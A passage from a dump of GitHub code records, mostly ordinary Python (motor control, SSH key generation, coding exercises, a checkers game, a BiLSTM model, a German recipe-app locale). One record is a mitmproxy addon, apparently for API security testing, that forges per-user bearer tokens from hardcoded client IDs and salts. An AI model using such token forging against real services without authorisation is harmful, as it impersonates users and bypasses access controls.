'):\n t= texto.select_one('.post__link')\n d= texto.select_one('.post__title')\n\n\n\n print(t, t.text, sep='\\t')","repo_name":"muriloeduardo199/webscrepy","sub_path":"web_scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18780160704","text":"\"\"\"\npythonnet_template\n==================\n\nAn example written to show control of a BSC101 stepper motor controller.\n\"\"\"\nimport os\nimport time\nimport sys\nimport clr\n\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.DeviceManagerCLI.dll\")\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.GenericMotorCLI.dll\")\nclr.AddReference(\"C:\\\\Program Files\\\\Thorlabs\\\\Kinesis\\\\Thorlabs.MotionControl.Benchtop.StepperMotorCLI.dll\")\nfrom Thorlabs.MotionControl.DeviceManagerCLI import *\nfrom Thorlabs.MotionControl.GenericMotorCLI import *\nfrom Thorlabs.MotionControl.Benchtop.StepperMotorCLI import *\nfrom System import Decimal # necessary for real world units\n\ndef main():\n \"\"\"The main entry point for the application\"\"\"\n\n # Uncomment this line if you are using\n # SimulationManager.Instance.InitializeSimulations()\n\n try:\n\n DeviceManagerCLI.BuildDeviceList()\n\n # create new device\n serial_no = \"40000001\" # Replace this line with your device's serial number\n\n # Connect, begin polling, and enable\n device = BenchtopStepperMotor.CreateBenchtopStepperMotor(serial_no)\n device.Connect(serial_no)\n time.sleep(0.25) # wait statements are important to allow settings to be sent to the device\n\n # For benchtop devices, get the channel\n channel = device.GetChannel(1)\n\n # Ensure that the device settings have been initialized\n if not channel.IsSettingsInitialized():\n channel.WaitForSettingsInitialized(10000) # 10 second timeout\n assert channel.IsSettingsInitialized() is True\n\n # Start polling and enable\n channel.StartPolling(250) #250ms polling rate\n time.sleep(25)\n channel.EnableDevice()\n time.sleep(0.25) # Wait for device to enable\n\n # Get Device Information and display description\n device_info = channel.GetDeviceInfo()\n print(device_info.Description)\n\n # Load any configuration settings needed by the controller/stage\n channel_config = channel.LoadMotorConfiguration(serial_no) # If using BSC203, change serial_no to channel.DeviceID. \n chan_settings = channel.MotorDeviceSettings\n\n channel.GetSettings(chan_settings)\n\n channel_config.DeviceSettingsName = 'HS NRT150 Enc Stage 150mm'\n\n channel_config.UpdateCurrentConfiguration()\n\n channel.SetSettings(chan_settings, True, False)\n\n # Get parameters related to homing/zeroing/other\n\n # Home or Zero the device (if a motor/piezo)\n print(\"Homing Motor\")\n channel.Home(60000)\n print(\"Done\")\n # Move the device to a new position\n channel.SetMoveRelativeDistance(Decimal(5.0))\n\n print(\"Moving 10 times\")\n for i in range(10):\n channel.MoveRelative(10000)\n time.sleep(5)\n print(\"Done\")\n\n # Stop Polling and Disconnect\n channel.StopPolling()\n device.Disconnect()\n\n except Exception as e:\n # this can be bad practice: It sometimes obscures the error source\n print(e)\n\n # Uncomment this line if you are using Simulations\n # SimulationManager.Instance.UninitializeSimulations()\n ...\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Thorlabs/Motion_Control_Examples","sub_path":"Python/Benchtop/BSC101/bsc101_pythonnet.py","file_name":"bsc101_pythonnet.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"43"} +{"seq_id":"9880954788","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\nimport os\nfrom app.common import ensure_dir\n\ndef generate_keys(path):\n # generate private/public key pair\n key = rsa.generate_private_key(backend=default_backend(), public_exponent=65537, key_size=2048)\n\n # get public key in OpenSSH format\n public_key = key.public_key().public_bytes(serialization.Encoding.PEM, serialization.PublicFormat.PKCS1)\n\n # get private key in PEM container format\n pem = key.private_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption())\n\n # decode to printable strings\n private_key_str = pem.decode('utf-8')\n public_key_str = public_key.decode('utf-8')\n\n ensure_dir(path)\n\n private_key_path = os.path.join(path, \"id_rsa\")\n with open(private_key_path, \"w\") as w:\n w.write(private_key_str)\n os.chmod(private_key_path, 0o600)\n with open(os.path.join(path, \"id_rsa.pub\"), \"w\") as w:\n w.write(public_key_str)\n\n return private_key_str, public_key_str\n","repo_name":"guysoft/fedigroup","sub_path":"src/app/make_ssh_key.py","file_name":"make_ssh_key.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"41813476732","text":"# implementation of stack using list\nstack = []\nchoice = 'y'\n\nprint('1. Push\\n2. Pop\\n3. Display elements of stack')\n\nwhile True:\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n elem = input(\"Enter your element which you want to push: \")\n stack.append(elem)\n elif choice == 2:\n if stack == []:\n print(\"Stack is empty... cannot delete element\")\n else:\n print(\"Deleted element is: \" + stack.pop())\n elif choice == 3:\n for i in range(len(stack) - 1, -1, -1):\n print(stack[i])\n else:\n print(\"Wrong input !!\")\n","repo_name":"mr-vaibh/python-payroll","sub_path":"PRACTICAL-FILES/others/3-stack.py","file_name":"3-stack.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23741714983","text":"#630510642\n#Wachiranan Phuangpanya\n#section002\n#Lab07_5\n\ndef rotate(num,pos):\n x = find_count(num) #Substitute the created function in the variable.\n if pos >=0: #Positive case.\n for i in range(1,pos+1):\n r = num%10\n num2 = num//10\n num = (r*(10**(x-1)))+num2 #Take a variable that represents a function. To be used as an exponent in the formula.\n return num\n else: #Negative case.\n for i in range(1,abs(pos)+1):\n r = num%(10**(x-1))\n num2 = num//(10**(x-1)) #Take a variable that represents a function. To be used as an exponent in the formula.\n num = (r*10)+num2\n return num\n \n\n\n\ndef find_count(num): #Function to find the number of digits of the entered number.\n count = 0\n while num !=0:\n num = num//10\n count += 1\n return count\n \n \n \ndef main():\n n = int(input()) #Enter the num value.\n p = int(input()) #Enter pos value.\n print(rotate(n,p)) #Show results.\n \n\n\n\nif __name__=='__main__':\n main()\n","repo_name":"WachirananNot/204111-Fundamentals-Of-Programming","sub_path":"Lab07/Lab07_5_630510642.py","file_name":"Lab07_5_630510642.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10253624666","text":"import math\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# A binary tree in which the left and right subtrees of every node differ \n# in height by no more than 1.\nclass Solution:\n def isBalanced(self, root: Optional[TreeNode]) -> bool:\n temp = [True]\n if not root: \n return temp[0]\n \n def rec(node: TreeNode) -> int: \n if not node: # a leaf node\n return 0\n \n leftHeight = rec(node.left)\n rightHeight = rec(node.right)\n \n if abs(leftHeight - rightHeight) > 1: \n temp[0] = False \n \n return 1 + max(leftHeight, rightHeight)\n \n rec(root)\n return temp[0]","repo_name":"apekshik/leetcode","sub_path":"110. Balanced Binary Tree.py","file_name":"110. Balanced Binary Tree.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1695933049","text":"# https://graphviz.readthedocs.io/en/stable/manual.html\nfrom graphviz import Digraph\nfrom pathlib import Path\n\nclass PlotGraph:\n \"Plot graph from a set of nodes and a list of edges\"\n\n def __call__(self, nodes, edges, path_save: str):\n # Create an empty graph\n self.digraph = Digraph(\"Pangeblock\")\n\n nodes_plot = [self.node2str(node) for node in nodes]\n edges_plot = [(self.node2str(edge[0]),self.node2str(edge[1])) for edge in edges]\n self.digraph = self.create_dot_graph(self.digraph,nodes_plot, edges_plot)\n \n path_save = Path(path_save)\n if path_save.suffix == \".dot\":\n path_save.parent.mkdir(parents=True, exist_ok=True)\n self.save_as_dot(path_save)\n else: \n raise(\"Path not valid, must be a '.dot' file\")\n \n\n def create_dot_graph(self, graph, nodes, edges):\n \"Create graph in 'dot' language to be plotted\"\n # Add nodes to the graph\n for node in nodes: \n graph.node(node)\n # Add edges to the graph\n for edge in edges: \n u, v = edge\n graph.edge(u,v)\n\n return graph\n\n def show(self, graph):\n \"Print graph\"\n # self.create_dot_graph(self.nodes, self.edges)\n return graph #self.digraph\n\n def save_as_dot(self, path_save: str = \"graph.dot\"):\n \" Save tree as .dot file to generate plot with grahviz\"\n self.digraph.render(filename=path_save)\n\n def node2str(self, node):\n return f\"K=({','.join(str(_) for _ in node.K)}),i={node.i},j={node.j},{node.label}\"","repo_name":"AlgoLab/pangeblocks","sub_path":"src/graph/plot_graph.py","file_name":"plot_graph.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"1970869792","text":"import logging\nimport hashlib\nfrom urllib.parse import urlparse\nfrom mitmproxy import http\n\n# The users\n\nusers = {\n \"1\": {\n \"client_id\": \"0388941f\",\n \"salt\": \"vinegar\"\n },\n \"2\": {\n \"client_id\": \"4be75c87\",\n \"salt\": \"tabasco\"\n },\n \"3\": {\n \"client_id\": \"12345678\",\n \"salt\": \"hendos\"\n }\n}\n\ndef gen_hash(path, client_id, salt, body):\n return hashlib.sha256((path+client_id+body+salt).encode('utf-8')).hexdigest()\n\ndef request(flow: http.HTTPFlow) -> None:\n if 'user-id' in flow.request.headers:\n user_id = flow.request.headers['user-id']\n logging.info (\"User-id: \" + user_id)\n\n # The user ID -1 means do not add a header so just bail out now\n if user_id == \"-1\":\n return\n\n # See if we know about the requested user, if so, use it, if not, default to user 1\n if user_id in users:\n logging.info (\"Using user \" + user_id)\n user = users[user_id]\n else:\n logging.info (\"Unknown user requested, using user 1\")\n user = users[\"1\"]\n else:\n logging.info (\"No user supplied, using user 1\")\n user = users[\"1\"]\n\n url_parsed = urlparse(flow.request.url)\n path = url_parsed.path\n logging.info (\"URL: \" + flow.request.url)\n logging.info (\"Path: \" + path)\n logging.info (\"Client ID: \" + user[\"client_id\"])\n logging.info (\"Salt: \" + user[\"salt\"])\n\n # GET requests have an empty body so don't need to check\n # if GET or other method\n body = flow.request.content.decode(\"utf-8\")\n logging.info (\"Body: \" + body)\n\n token = gen_hash (path, user[\"client_id\"], user[\"salt\"], body)\n logging.info (\"Token: \" + token)\n\n if \"bearer\" in flow.request.headers:\n logging.info (\"Bearer token already passed, not modifying it\")\n else:\n flow.request.headers[\"bearer\"] = token\n\n if \"client-id\" in flow.request.headers:\n logging.info (\"Client ID already passed, not modifying it\")\n else:\n flow.request.headers[\"client-id\"] = user['client_id']\n","repo_name":"digininja/bearer_injection","sub_path":"multiuser.py","file_name":"multiuser.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"11444764653","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nGAME_BOARD = \"\"\"\n A B C D E F G H\n +—————————————————+\n1 | {} {} {} {} {} {} {} {} |\n2 | {} {} {} {} {} {} {} {} |\n3 | {} {} {} {} {} {} {} {} |\n4 | {} {} {} {} {} {} {} {} |\n5 | {} {} {} {} {} {} {} {} |\n6 | {} {} {} {} {} {} {} {} |\n7 | {} {} {} {} {} {} {} {} |\n8 | {} {} {} {} {} {} {} {} |\n +—————————————————+\n\"\"\"\n\nALPHA = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\"]\n\nPLAYER_ONE = \"Player One\"\nPLAYER_TWO = \"Player Two\"\n\nBLACK_SQUARE = \"■\"\nWHITE_SQUARE = \".\"\n\nBLACK = \"x\"\nWHITE = \"o\"\nBLACK_KINGED = \"X\"\nWHITE_KINGED = \"O\"\n\nKINGED_MOVES = (-1, -1), (-1, 1), (1, 1), (1, -1)\nBLACK_MOVES = (-1, -1), (-1, 1)\nWHITE_MOVES = (1, 1), (1, -1)\n\nWHITE_PIECES = (WHITE, WHITE_KINGED)\nBLACK_PIECES = (BLACK, BLACK_KINGED)\n\nWHITE_START_POSITIONS = [\n (0, 1), (0, 3), (0, 5), (0, 7),\n (1, 0), (1, 2), (1, 4), (1, 6),\n (2, 1), (2, 3), (2, 5), (2, 7)\n]\n\nBLACK_START_POSITIONS = [\n (5, 0), (5, 2), (5, 4), (5, 6),\n (6, 1), (6, 3), (6, 5), (6, 7),\n (7, 0), (7, 2), (7, 4), (7, 6),\n]\n\n\ndef display_board(board):\n current_board = [board[(x, y)] for x in range(8) for y in range(8)]\n print(GAME_BOARD.format(*current_board))\n\n\ndef setup_board(board):\n for position in WHITE_START_POSITIONS:\n board[position] = WHITE\n for position in BLACK_START_POSITIONS:\n board[position] = BLACK\n\n\ndef get_piece_moves(player, piece):\n if piece in (WHITE_KINGED, BLACK_KINGED):\n return KINGED_MOVES\n elif player is PLAYER_ONE:\n return BLACK_MOVES\n elif player is PLAYER_TWO:\n return WHITE_MOVES\n\n\ndef is_legal_move(board, player, piece_coordinate, move_coordinate):\n possible_piece_moves = get_piece_moves(player, board[piece_coordinate])\n return move_coordinate in allowed_moves_for_piece(\n board, player, piece_coordinate, possible_piece_moves\n )\n\n\ndef is_white_piece(board, coordinate):\n return board[coordinate] in WHITE_PIECES\n\n\ndef is_black_piece(board, coordinate):\n return board[coordinate] in BLACK_PIECES\n\n\ndef is_in_board_bounds(x, y):\n return 0 <= x <= 7 and 0 <= y <= 7\n\n\ndef allowed_moves_for_piece(board, player, piece_coordinate, possible_move_coordinates):\n x, y = piece_coordinate\n allowed_moves = []\n for move_coordinate in possible_move_coordinates:\n move = (x + move_coordinate[0], y + move_coordinate[1])\n if not is_in_board_bounds(*move):\n continue\n if player is PLAYER_ONE:\n if is_white_piece(board, move):\n move = (move[0] + move_coordinate[0], move[1] + move_coordinate[1])\n if not is_in_board_bounds(*move) or board[move] != BLACK_SQUARE:\n continue\n elif is_black_piece(board, move):\n continue\n elif player is PLAYER_TWO:\n if is_black_piece(board, move):\n move = (move[0] + move_coordinate[0], move[1] + move_coordinate[1])\n if not is_in_board_bounds(*move) or board[move] != BLACK_SQUARE:\n continue\n pass\n elif is_white_piece(board, move):\n continue\n if board[move] == BLACK_SQUARE:\n allowed_moves.append(move)\n continue\n\n return allowed_moves\n\n\ndef get_capturing_moves_for_piece(\n board, player, piece_coordinate, possible_move_coordinates\n):\n x, y = piece_coordinate\n capturing_moves = []\n for move_coordinate in possible_move_coordinates:\n move = (x + move_coordinate[0] * 2, y + move_coordinate[1] * 2)\n if not is_in_board_bounds(*move):\n continue\n if board[move] != BLACK_SQUARE:\n continue\n capture_coordinates = get_capture_coordinates(move, piece_coordinate)\n if player is PLAYER_ONE and can_capture_piece(\n board, capture_coordinates, WHITE_PIECES\n ):\n capturing_moves.append(move)\n elif player is PLAYER_TWO and can_capture_piece(\n board, capture_coordinates, BLACK_PIECES\n ):\n capturing_moves.append(move)\n\n return capturing_moves\n\n\ndef make_move(board, piece_coordinate, move_coordinate):\n board[move_coordinate], board[piece_coordinate] = (\n board[piece_coordinate],\n board[move_coordinate],\n )\n\n\ndef is_current_player_piece(board, player, coordinate):\n if player is PLAYER_ONE:\n return board[coordinate] in BLACK_PIECES\n elif player is PLAYER_TWO:\n return board[coordinate] in WHITE_PIECES\n\n\ndef select_piece(board, player):\n user_input = None\n while (\n user_input is None\n or not is_valid_coordinate(user_input)\n or not is_black_square(*get_move_coordinates(user_input))\n or not is_current_player_piece(board, player, get_move_coordinates(user_input))\n ):\n user_input = clean_input(input(\"{} select piece to move: \".format(player)))\n\n return get_move_coordinates(user_input)\n\n\ndef enter_move(board, player, piece):\n user_input = None\n while (\n user_input is None\n or not is_valid_coordinate(user_input)\n or not is_legal_move(board, player, piece, get_move_coordinates(user_input))\n ):\n user_input = clean_input(input(\"{} enter your move: \".format(player)))\n\n return get_move_coordinates(user_input)\n\n\ndef clean_input(string):\n return string.strip().upper()\n\n\ndef is_valid_coordinate(move):\n return re.match(r\"^[0-9][a-hA-H]$\", move) is not None\n\n\ndef get_move_coordinates(move):\n return int(move[0]) - 1, alpha_to_coordinate(move[1])\n\n\ndef alpha_to_coordinate(char):\n return ALPHA.index(char.upper())\n\n\ndef is_black_square(x, y):\n return (x + y) % 2 != 0\n\n\ndef switch_players(current_player):\n if current_player == PLAYER_ONE:\n return PLAYER_TWO\n elif current_player == PLAYER_TWO:\n return PLAYER_ONE\n\n\ndef can_capture_piece(board, capture_coordinates, opponents_pieces):\n return board[capture_coordinates] in opponents_pieces\n\n\ndef get_capture_coordinates(move_coordinate, piece_coordinate):\n return (\n (piece_coordinate[0] + move_coordinate[0]) / 2,\n (piece_coordinate[1] + move_coordinate[1]) / 2,\n )\n\n\ndef has_captured_piece(move_coordinate, piece_coordinate):\n if abs(piece_coordinate[0] - move_coordinate[0]) == 1:\n return False\n return True\n\n\ndef capture_piece(board, piece_coordinate, move_coordinate):\n capture = get_capture_coordinates(move_coordinate, piece_coordinate)\n board[capture] = BLACK_SQUARE\n\n\ndef get_board_square(x, y):\n return BLACK_SQUARE if is_black_square(x, y) else WHITE_SQUARE\n\n\ndef choose_follow_up_move(capturing_moves):\n if not len(capturing_moves):\n return None\n\n # Todo: handle forced capturing moves\n # Allow choice if multiple pieces can be captured\n allowed_follow_ups = [coordinates_to_string(*move) for move in capturing_moves]\n print(\", \".join(allowed_follow_ups))\n user_input = None\n while (\n user_input is None\n or not is_valid_coordinate(user_input)\n or user_input not in allowed_follow_ups\n ):\n user_input = clean_input(input(\"Select a follow up capture: \"))\n\n return capturing_moves[allowed_follow_ups.index(user_input)]\n\n\ndef count_pieces(board):\n white_piece_count = 0\n black_piece_count = 0\n for coordinate in board:\n if board[coordinate] in BLACK_PIECES:\n black_piece_count += 1\n elif board[coordinate] in WHITE_PIECES:\n white_piece_count += 1\n return black_piece_count, white_piece_count\n\n\ndef make_kinged_piece(board, current_player, moved_to_coordinate, piece_coordinate):\n if moved_to_coordinate is None:\n moved_to_coordinate = piece_coordinate\n if current_player is PLAYER_ONE and moved_to_coordinate[0] is 0:\n board[moved_to_coordinate] = BLACK_KINGED\n elif current_player is PLAYER_TWO and moved_to_coordinate[0] is 7:\n board[moved_to_coordinate] = WHITE_KINGED\n\n\ndef follow_up_player_move(board, current_player, moved_to_coordinate, piece_coordinate):\n while moved_to_coordinate is not None and has_captured_piece(\n moved_to_coordinate, piece_coordinate\n ):\n capture_piece(board, piece_coordinate, moved_to_coordinate)\n possible_move_coordinates = get_piece_moves(\n current_player, board[moved_to_coordinate]\n )\n capturing_moves = get_capturing_moves_for_piece(\n board, current_player, moved_to_coordinate, possible_move_coordinates\n )\n follow_up_coordinate = choose_follow_up_move(capturing_moves)\n if follow_up_coordinate is not None:\n make_move(board, moved_to_coordinate, follow_up_coordinate)\n capture_piece(board, moved_to_coordinate, follow_up_coordinate)\n piece_coordinate = moved_to_coordinate\n moved_to_coordinate = follow_up_coordinate\n return moved_to_coordinate, piece_coordinate\n\n\ndef initial_player_move(board, current_player):\n display_board(board)\n piece_coordinate = select_piece(board, current_player)\n moved_to_coordinate = enter_move(board, current_player, piece_coordinate)\n make_move(board, piece_coordinate, moved_to_coordinate)\n return moved_to_coordinate, piece_coordinate\n\n\ndef coordinates_to_string(x, y):\n return str(x + 1) + ALPHA[y]\n\n\ndef play():\n current_player = PLAYER_ONE\n board = {(x, y): get_board_square(x, y) for x in range(8) for y in range(8)}\n setup_board(board)\n while True:\n moved_to_coordinate, piece_coordinate = initial_player_move(\n board, current_player\n )\n moved_to_coordinate, piece_coordinate = follow_up_player_move(\n board, current_player, moved_to_coordinate, piece_coordinate\n )\n make_kinged_piece(board, current_player, moved_to_coordinate, piece_coordinate)\n black_piece_count, white_piece_count = count_pieces(board)\n\n if white_piece_count is 0:\n print(\"Player one wins\")\n break\n\n if black_piece_count is 0:\n print(\"Player two wins\")\n break\n\n current_player = switch_players(current_player)\n\n\nif __name__ == '__main__':\n play()\n","repo_name":"OrderAndCh4oS/checkers","sub_path":"play_checkers/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"33094565343","text":"#\n# @lc app=leetcode id=896 lang=python3\n#\n# [896] Monotonic Array\n#\nfrom typing import List\n# @lc code=start\nclass Solution:\n def isMonotonic(self, A: List[int]) -> bool:\n n = len(A)\n dirc = 0\n if n<=1:\n return True\n for i in range(1,n):\n if A[i]A[i-1]:\n if dirc == 0 or dirc==-1:\n dirc = -1\n else:\n return False\n return True\n\n def isMonotonic2(self, nums):\n n = len(A)\n if n<=1:\n return True\n inc = True\n dec = True\n for i in range(1, n):\n inc &= (nums[i - 1] <= nums[i])\n dec &= (nums[i - 1] >= nums[i])\n if not inc and not dec:\n return False\n return True\n\n# @lc code=end\n\nA = [1,2,4,5]\nA = [1,3,2]\nA = [6,5,4,4]\n# A = [1,2,2,3]\nA = []\nA = [1,1]\n\n\nres = Solution().isMonotonic2(A)\nprint(res)","repo_name":"szr22/algorithm","sub_path":"leetcode/896.monotonic-array.py","file_name":"896.monotonic-array.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9378597170","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 21 19:25:48 2015\r\n\r\n@author: Lily\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nplt.close(1)\r\nplt.close(2)\r\nplt.close(3)\r\nm = np.loadtxt(r\"D:\\UNQ\\IACI\\1_PTZ\\PYTHON\\Camera\\calibratorResults.txt\", skiprows=1)\r\n\r\nplt.figure(1)\r\nplt.plot(m[:,0], m[:,1], 'bs', label='fx')\r\nplt.plot(m[:,0], m[:,2], 'rs', label='fy')\r\nplt.plot(m[:,0], m[:,1], 'b', m[:,0], m[:,2], 'r')\r\nplt.title('Zoom vs f')\r\nplt.xlabel('fx, fy [pixel]')\r\nplt.ylabel('zoom [%]')\r\nplt.legend(loc=2)\r\ndeg = 1\r\np = np.polyfit(m[:,0], m[:,2],deg)\r\nplt.text(40,10000, 'y = ' + str(p[0]) + 'x + ' + str(p[1]))\r\nplt.show()\r\n\r\nplt.figure(2)\r\nplt.plot(m[:,0], m[:,3], 'bs', label='fovx')\r\nplt.plot(m[:,0], m[:,4], 'rs', label='fovy')\r\nplt.plot(m[:,0], m[:,3], 'b', m[:,0], m[:,4], 'r')\r\nplt.title('Zoom vs fov')\r\nplt.xlabel('fovx, fovy [º]')\r\nplt.ylabel('zoom [%]')\r\nplt.legend(loc=1)\r\ndeg = 2\r\np = np.polyfit(m[:,0], m[:,3],deg)\r\nplt.text(15,5, 'y = ' + str(p[0]) + 'x^2 + ' + str(p[1]) + 'x + ' + str(p[2]))\r\np = np.polyfit(m[:,0], m[:,4],deg)\r\nplt.text(20,45, 'y = ' + str(p[0]) + 'x^2 + ' + str(p[1]) + 'x + ' + str(p[2]))\r\n\r\nplt.show()\r\n\r\nplt.figure(3)\r\nplt.plot(m[:,0], m[:,5], 'gs', label='focalLength')\r\nplt.plot(m[:,0], m[:,5], 'g')\r\nplt.title('Zoom vs focalLength')\r\nplt.xlabel('focalLength [mm]')\r\nplt.ylabel('zoom [%]')\r\nplt.legend(loc=1)\r\ndeg = 1\r\np = np.polyfit(m[:,0], m[:,5],deg)\r\nplt.text(20,5, 'y = ' + str(p[0]) + 'x + ' + str(p[1]))\r\nplt.show()\r\n\r\n\r\n#deg = 1\r\n#p = np.polyfit(m[:,0], m[:,5],deg)\r\n## p(x) = p[0] * x**deg + ... + p[deg] \r\n#print 'y = ' + str(p[0]) + 'x + ' + str(p[1])\r\n","repo_name":"liliangr/cachita","sub_path":"scripts/PTZ Calibration/Graphics4CalibratorResults.py","file_name":"Graphics4CalibratorResults.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39766698741","text":"import torch\nfrom torch import nn\nfrom collections import OrderedDict\nfrom torch.nn.utils.rnn import *\n\n\nclass BiLSTM(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, num_layers, use_gpu=False):\n super().__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.num_layers = num_layers\n self.use_gpu = use_gpu\n\n self.input_layers = nn.Sequential(OrderedDict([\n (\"conv_1d\", nn.Conv1d(input_size, hidden_size * 2, 5, stride=1, padding=2)),\n ('relu', nn.ReLU())\n ]))\n\n self.lstm = nn.LSTM(\n input_size=hidden_size * 2,\n hidden_size=hidden_size,\n num_layers=num_layers,\n bidirectional=True,\n batch_first=False\n )\n\n self.output_layer = nn.Sequential(OrderedDict([\n (\"linear_0\", nn.Linear(hidden_size * 2, 256)),\n (\"relu_0\", nn.ReLU()),\n (\"linear_1\", nn.Linear(256, output_size)),\n ]))\n\n def __call__(self, x, x_len):\n if self.use_gpu:\n x = x.cuda()\n\n x = self.input_layers(x.permute(1, 2, 0)).permute(2, 0, 1)\n packed_X = pack_padded_sequence(x, x_len, enforce_sorted=False)\n packed_out = self.lstm(packed_X)[0]\n out, out_lens = pad_packed_sequence(packed_out)\n out = self.output_layer(out).log_softmax(2)\n\n return out, out_lens\n\n\n","repo_name":"ChiWanZi1898/Utterance2Phoneme","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34692220782","text":"# -*- coding: utf-8 -*-\n# we set up default information for our locale.\n# Translators should use this file as the basis of their translation.\n# Copy this file and rename it for you locale.\n#\n# For example, Spanish uses:\n# defaults_es.py\n#\n# British English uses:\n# defaults_en_GB.py\n#\n# Please fill in the below fields:\n\n# Language: Deutsch (German)\n# Translator:\n# Last-updated: 2005-01-15 (07/18/05)\n\nfrom .abstractLang import AbstractLanguage\nfrom typing import Collection, Mapping, Any\n\nclass Language(AbstractLanguage):\n\n CREDITS = \"\"\n\n #The next line can be used to determine some things about how to handle this language\n LANG_PROPERTIES={'hasAccents':True, 'capitalisedNouns':True,'useFractions':False}\n\n\n # TRANSLATOR WARNING: DO NOT TRANSLATE THE FIELD NAMES: ONLY THE VALUES!!!\n\n # only translate the items in the list [..] (and feel free to create\n # categories that make sense for your locale -- no need to translate\n # these ones). DO NOT translate 'cuisine','rating','source' or\n # 'category'\n\n # The below are Gourmet's standard fields and the default categories for them.\n # Do not translate the field names ('cuisine','rating','source,'category').\n # Instead, fill in the list with categories that make sense for your locale.\n # Feel free to change the number or content of categories to be consistent\n # with what users in your locale are likely to be familiar with.\n\n fields={'cuisine': ['deutsch', 'amerikanisch','italienisch','französisch',\n 'mexikanisch','asiatisch','indisch','griechisch','vegetarisch'],\n\n 'rating' : ['5 - ausgezeichnet','4 - lecker',\n '3 - OK','2 - mittelmäßig','1 - vergiss es!',\n '(nicht geprüft)'],\n\n 'source' : [],\n\n 'category' :[\n 'Nachspeise','Vorspeise','Hauptgericht',\n 'Beilage','Salat','Suppe','Frühstück',\n 'Picknick','Andere','Plan'],\n }\n\n # In English, there are a heck of a lot of synonyms. This is a list\n # for those synonyms. [u\"preferred word\",\"alternate word\",\"alternate word\"]\n # If there are none of these that you can think of in your language, just\n # set this to:\n # SYNONYMS=[]\n\n # note from translator: some terms are not standard but used in common langugage, some are used in a fautive manner,\n # I decided to put them in different sections so it is still clear what is a synonym and what should not be a synonym.\n SYNONYMS=[\n # the first item of each list is the default\n [\"Cocktailtomaten\", \"Tomaten, cherry\"],\n [\"Alfaalfa\",\"Alfapha\",\"Luzerne\"],\n [\"Porree\",\"Lauch\"],\n [\"Frühlingszwiebel\",\"Lauch-Zwiebeln\"],\n [\"Zuckermelone\",\"Gartenmelone\"],\n [\"Bleichsellerie\",\"Stangensellerie\", \"Straudensellerie\"],\n [\"Hammelfleisch\",\"Hammel\"],\n [\"Kalbfleisch\",\"Kalb\"],\n [\"Truthahn\",\"Puter\",\"Pute\"],\n [\"Rindfleisch\",\"Rind\"],\n [\"Rotbusch\",\"Rooibos\",\"Rooibosch\"],\n [\"Seelachs\",\"Köhler\"],\n [\"Anschovis\",\"Anchovis\",\"Sardelle\"],\n [\"Kabeljau\",\"Dorsch\"],\n [\"Nutella\", \"Nusspli\"],\n [\"Tomatenmark\",\"Tomatenkonzentrat\"],\n [\"Weizenmehl\",\"Mehl, weiß\"],\n [\"Soja-Milch\",\"Sojamilch\",\"Soya-Milch\", \"Soja Milch\"],\n [\"Soja-Sauce\", \"sauce soja\",\"sauce soya\",\"Soya-Sauce\",\"Sojasoße\", \"Sojasosse\"],\n [\"Soja\",\"Soya\"],\n [\"Sojabohnen\",\"Soyabohnen\"],\n [\"Püree\",\"Kartoffelpüree\"],\n [\"Müsli\",\"Muesli\"],\n [\"Nudeln\",\"Pasta\"],\n [\"Chile\",\"Chili\",\"Chilli\"],\n [\"Zucchini\", \"Zuchini\", \"Courgette\"],\n [\"Tafeltrauben\",\"Trauben, weiß\",\"Trauben, grün\"],\n [\"Garam Masala\",\"Masala\",\"Massala\",\"Garam Massala\"],\n [\"Gemüsebouillon\",\"Gemüsebrühe\"],\n [\"Hühnerbouillon\",\"Hühnerbrühe\"],\n 